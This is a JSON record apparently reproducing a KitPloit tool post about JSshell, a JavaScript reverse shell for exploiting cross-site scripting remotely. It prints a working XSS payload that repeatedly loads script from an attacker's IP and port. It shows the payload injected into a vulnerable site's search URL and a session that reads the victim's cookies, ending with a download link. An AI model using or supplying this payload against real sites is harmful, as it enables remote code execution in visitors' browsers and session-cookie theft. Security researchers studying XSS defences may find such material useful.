{"id": "KITPLOIT:2751138742638729202", "bulletinFamily": "tools", "title": "JSshell - A JavaScript Reverse Shell For Exploiting XSS Remotely Or Finding Blind XSS, Working With Both Unix And Windows OS", "description": "[  ](<https://1.bp.blogspot.com/-n8BaIm82kvg/Xss1tk-mNPI/AAAAAAAASrE/GfU5VEa22PwWq3y7cqvWpO0yIjTC5uKxACNcBGAsYHQ/s1600/JSshell.png>)\n\n \nJSshell - a JavaScript [ reverse ](<https://www.kitploit.com/search/label/Reverse> \"reverse\" ) shell. This using for exploit XSS remotely, help to find blind XSS, ... \nThis tool works for both Unix and Windows operating system and it can running with both Python 2 and Python 3. This is a big update of JShell - a tool to get a JavaScript shell with XSS by s0med3v. JSshell also doesn't require Netcat (different from other javascript shells). \n \n** Usage ** \n \n** Generate JS reverse shell payload: ` -g ` ** \n \n** Set the local port number for listening and generating [ payload ](<https://www.kitploit.com/search/label/Payload> \"payload\" ) (By default, it will be set to 4848): ` -p ` ** \n \n** Set the local source address for generating payload (JSshell will detect your IP address by deault): ` -s ` ** \n \n** Set timeout for shell connection (if the user exit page, the shell will be pause, and if your set the timeout, after a while without response, the shell will automatically close): ` -w ` ** \n \n** Execute a command when got the shell: ` -c ` ** \n \n** Example usages: ** \n\n\n * ` js.py `\n * ` js.py -g `\n * ` js.py -p 1234 `\n * ` js.py -s 48.586.1.23 -g `\n * ` js.py -c \"alert(document.cookie)\" -w 10 `\n \n** An example for running JSshell: ** \nThis is an example for step-by-step to exploit remote XSS using JSshell. \nFirst we will generate a reverse JS shell payload and set the shell timeout is 20 seconds: \n\n \n \n ~# whoami\n root\n ~# ls\n README.md js.py\n ~# python3 js.py -g -w 20\n __\n |(_ _ |_ _ | |\n \\_|__)_> | |(/_ | |\n v1.0\n \n Payload:\n <svg/onload=setInterval(function(){with(document)body.appendChild(createElement(\"script\")).src=\"//171.224.181.106:4848\"},999)>\n \n Listening on [any] 4848 for incoming JS shell ...\n\nNow paste this payload to the website (or URL) that [ vulnerable ](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) to XSS: \n` https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement(\"script\")).src=\"//171.224.181.106:4848\"},1248)> ` \nAccess the page and now we will see that we have got the reverse JS shell: \n\n \n \n __\n |(_ _ |_ _ | |\n \\_|__)_> | |(/_ | |\n v1.0\n \n Payload:\n <svg/onload=setInterval(function(){with(document)body.appendChild(createElement(\"script\")).src=\"//171.224.181.106:4848\"},999)>\n \n Listening on [any] 4848 for incoming JS shell ...\n Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848\n $ established\n $ the\n $ shell\n $\n $\n $ help\n JSshell using javascript code as shell commands. Also supports some commands:\n help This help\n exit, quit Exit the JS shell\n $\n\nNow let's execute some commands: \n\n \n \n $ var test = 'hacked'\n $ alert(hacked)\n $\n\nAnd the browser got an alert: ` hacked ` \n\n \n \n $ prompt(document.cookie)\n $\n\nAnd the browser print the user cookies: ` JSESSION=3bda8... ` \n\n \n \n $ exit\n ~# whoami\n root\n ~# pwd\n /home/shelld3v\n ~#\n\nAnd we quited! \n \n** Author ** \nThis created by shelld3v, [ hacking ](<https://www.kitploit.com/search/label/Hacking> \"hacking\" ) at HackOne and Bugcrowd with a secret account! This tool is inspired by JShell (s0med3v), using the BruteLogic payload. JSshell 2.0 will has some new features that include: \n\n\n * More payloads for ` <img> ` , ` <script> ` , ... \n * Some shortcut commands: print the current session, domain, endpoint, ... \n * Better GUI \n... \n \n \n\n\n** [ Download JSshell ](<https://github.com/shelld3v/JSshell> \"Download JSshell\" ) **\n", "published": "2020-06-06T21:30:06", "modified": "2020-06-06T21:30:06", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "http://www.kitploit.com/2020/06/jsshell-javascript-reverse-shell-for.html", "reporter": "KitPloit", "references": ["https://github.com/shelld3v/JSshell"], "cvelist": [], "type": "kitploit", "lastseen": "2020-06-07T01:27:04", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "4a931512ce65bdc9ca6808adf92d8783"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "27e69c2fb6a342d793806eeb3b24c440"}, {"key": "href", "hash": "0e005be4d0cf6b8331231781f179d9f8"}, {"key": "modified", "hash": "8ac34a14be096fb8b9340969a37917e2"}, {"key": "published", "hash": "8ac34a14be096fb8b9340969a37917e2"}, {"key": "references", "hash": "fca37affa2d4fb1ce0073300c94e8fac"}, {"key": "reporter", "hash": "aba454e3574969396c0dddcb45011dcc"}, {"key": "title", "hash": "2e10628e23dcf3550cb82254d972f25e"}, {"key": "toolHref", "hash": "048d79522699fdff819e3a663fe59fef"}, {"key": "type", "hash": "4553be2119d862322dd6fec6bb385401"}], "hash": "957a2eed03cd69c0908a0862e3f64bf71ae4a276c8d3c3e950f6f2c8c4d27444", "viewCount": 127, "enchantments": {"dependencies": {"references": [], "modified": "2020-06-07T01:27:04", "rev": 2}, "score": {"value": 0.1, "vector": "NONE", "modified": "2020-06-07T01:27:04", "rev": 2}, "vulnersScore": 0.1}, "objectVersion": "1.3", "toolHref": "https://github.com/shelld3v/JSshell"}

{}